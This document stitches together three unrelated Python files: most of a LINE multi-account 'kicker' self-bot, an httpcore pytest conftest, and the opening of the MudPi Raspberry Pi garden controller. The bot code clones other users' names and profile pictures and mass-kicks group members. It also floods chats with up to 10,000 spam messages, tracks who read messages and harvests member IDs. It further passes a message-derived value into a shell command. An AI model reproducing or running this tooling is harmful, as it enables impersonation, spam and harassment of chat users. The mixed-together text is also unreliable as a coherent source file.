profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
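# "Lurking" stores a read point for the chat; the op.type 55 handler near the end collects everyone who reads past it, and "Lurking result" prints the list.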
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------GROUP WIPE FUNCTION THAT SKIPS FELLOW BOTS/ADMINS----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#-------------------Spam functions start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Spam functions end----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke is pretty <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
elif msg.text in ["Join all"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ != target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#-------------------------------------------------
elif "/say-jp " in msg.text:
say = msg.text.replace("/say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#------------------------------------------------
elif "/say-en " in msg.text:
say = msg.text.replace("/say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#-----------------------------------------------
elif "/say " in msg.text:
psn = msg.text.replace("/say ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#-----------------------------------------------
elif "Siapa " in msg.text:
tanya = msg.text.replace("Siapa ","")
jawab = ("Dia yg kebanyakan micin"," Dia gila")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
elif "Dosa @" in msg.text:
tanya = msg.text.replace("Dosa @","")
jawab = ("60%","70%","80%","90%","100%","Tak terhingga")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendText(msg.to,"Dosanya adalah cek voie ini")
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
#==========================================
elif "/ " in msg.text.lower():
txt = msg.text.replace("kedapkedip ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#-------Lurker check, made to feel like Siri-----------------------------
elif "Setlastpoint" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
#cl.sendText(msg.to, "Checkpoint checked!")
cl.sendText(msg.to, "Set the lastseens' point(`・ω・´)\n\n" + datetime.now().strftime('%H:%M:%S'))
print "Setlastpoint"
#--------------------------------------------
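# "Viewlastseen" parses the "mid|timestamp" lines appended to dataSeen/<group>.txt by the read-receipt hook and reports each member's last-seen time.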
elif "Viewlastseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%d日 %H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
grp = '\n• '.join(str(f) for f in dataResult)
total = '\nThese %i users have seen up to the lastseen\npoint(`・ω・´)\n\n%s' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "• %s %s" % (grp, total))
else:
cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen")
print "Viewlastseen"
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["Assalammualaikum","Tag","mention"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
cl.sendText(msg.to,'Member count exceeds the limit.')
else:
# mention in batches of 100 to stay within the per-message mention limit
for i in range(0, jml, 100):
mention(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
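# Operation handlers: param3 == "1" reverts protected group-name changes, op.type 32 kicks and blacklists whoever invited a blacklisted user, op.type 55 feeds the lurking tracker.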
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots or op.param2 in admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
pass
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
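# autoSta continuously polls the timeline and auto-likes/auto-comments fresh posts while likeOn/commentOn are set; it gives up after 50 consecutive errors.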
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
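# nameUpdate re-appends the current time to the display name every 10 minutes while wait["clock"] is on; a2 above was meant to gate updates to 10-minute marks.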
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
conftest.py | import contextlib
import os
import threading
import time
import typing
import pytest
import uvicorn
from httpcore._types import URL
from .utils import Server, http_proxy_server
SERVER_HOST = "example.org"
HTTPS_SERVER_URL = "https://example.org"
@pytest.fixture(scope="session")
def proxy_server() -> typing.Iterator[URL]:
proxy_host = "127.0.0.1"
proxy_port = 8080
with http_proxy_server(proxy_host, proxy_port) as proxy_url:
yield proxy_url
class UvicornServer(uvicorn.Server):
def install_signal_handlers(self) -> None:
pass
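# serve_in_thread runs the uvicorn server on a background thread, waits for startup, and guarantees shutdown (should_exit) on exit.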
@contextlib.contextmanager
def serve_in_thread(self) -> typing.Iterator[None]:
thread = threading.Thread(target=self.run)
thread.start()
try:
while not self.started:
time.sleep(1e-3)
yield
finally:
self.should_exit = True
thread.join()
async def app(scope: dict, receive: typing.Callable, send: typing.Callable) -> None:
assert scope["type"] == "http"
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
@pytest.fixture(scope="session")
def uds_server() -> typing.Iterator[UvicornServer]:
uds = "test_server.sock"
config = uvicorn.Config(app=app, lifespan="off", loop="asyncio", uds=uds)
server = UvicornServer(config=config)
try:
with server.serve_in_thread():
yield server
finally:
os.remove(uds)
@pytest.fixture(scope="session")
def server() -> Server:
return Server(SERVER_HOST, port=80)
@pytest.fixture(scope="session")
def https_server() -> Server:
return Server(SERVER_HOST, port=443)
|
mudpi.py | import RPi.GPIO as GPIO
import threading
import datetime
import socket
import redis
import time
import json
import sys
sys.path.append('..')
from action import Action
from config_load import loadConfigJson
from server.mudpi_server import MudpiServer
from workers.pi.lcd_worker import LcdWorker
from workers.pi.i2c_worker import PiI2CWorker
from workers.pi.relay_worker import RelayWorker
from workers.pi.camera_worker import CameraWorker
from workers.pi.sensor_worker import PiSensorWorker
from workers.pi.control_worker import PiControlWorker
from workers.trigger_worker import TriggerWorker
from workers.sequence_worker import SequenceWorker
try:
from workers.arduino.arduino_worker import ArduinoWorker
NANPY_ENABLED = True
except ImportError:
NANPY_ENABLED = False
try:
from workers.adc_worker import ADCMCP3008Worker
MCP_ENABLED = True
except ImportError:
MCP_ENABLED = False
from logger.Logger import Logger, LOG_LEVEL
import variables
##############################
# MudPi Core
# Author: Eric Davisson (@theDavisson) [EricDavisson.com]
# https://mudpi.app
# MudPi Core is a python library to gather sensor readings, control components,
# and manage devices using a Raspberry Pi on an event based system using redis.
#
CONFIGS = {}
PROGRAM_RUNNING = True
threads = []
actions = {}
sequences = {}
relays = []
relayEvents = {}
relay_index = 0
sequenceEvents = {}
sequence_index = 0
workers = []
nodes = []
print(chr(27) + "[2J")
print('Loading MudPi Configs...\r', end="", flush=True)
CONFIGS = loadConfigJson()
# Singleton redis to prevent connection conflicts
try:
r = redis.Redis(host=CONFIGS['redis'].get('host', '127.0.0.1'), port=int(CONFIGS['redis'].get('port', 6379)))
except KeyError:
r = redis.Redis(host='127.0.0.1', port=6379)
# Waiting for redis and services to be running
time.sleep(5)
print('Loading MudPi Configs...\t\033[1;32m Complete\033[0;0m')
print(chr(27) + "[2J")
# Print a display logo for startup
print("\033[1;32m")
print(' __ __ _ _____ _ ')
print('| \/ | | | __ (_)')
print('| \ / |_ _ __| | |__) | ')
print('| |\/| | | | |/ _` | ___/ | ')
print('| | | | |_| | (_| | | | | ')
print('|_| |_|\__,_|\__,_|_| |_| ')
print('_________________________________________________')
print('')
print('Eric Davisson @theDavisson')
print('https://mudpi.app')
print('Version: ', CONFIGS.get('version', '0.9.1'))
print('\033[0;0m')
if CONFIGS.get('debug') is True:
print('\033[1;33mDEBUG MODE ENABLED\033[0;0m')
print("Loaded Config\n--------------------")
for index, config in CONFIGS.items():
if config != '':
print('%s: %s' % (index, config))
time.sleep(10)
try:
print('Initializing Logger \r', end="", flush=True)
Logger.logger = Logger(CONFIGS)
time.sleep(0.05)
Logger.log(LOG_LEVEL["info"], 'Initializing Logger...\t\t\t\033[1;32m Complete\033[0;0m')
Logger.log_to_file(LOG_LEVEL["debug"], "Dumping the config file: ")
for index, config in CONFIGS.items():
Logger.log_to_file(LOG_LEVEL["debug"], '%s: %s' % (index, config))
Logger.log_to_file(LOG_LEVEL["debug"], "End of config file dump!\n")
except Exception as e:
Logger.log(LOG_LEVEL["info"], 'Initializing Logger...\t\t\t\033[1;31m Disabled\033[0;0m')
try:
print('Initializing Garden Control \r', end="", flush=True)
GPIO.setwarnings(False)
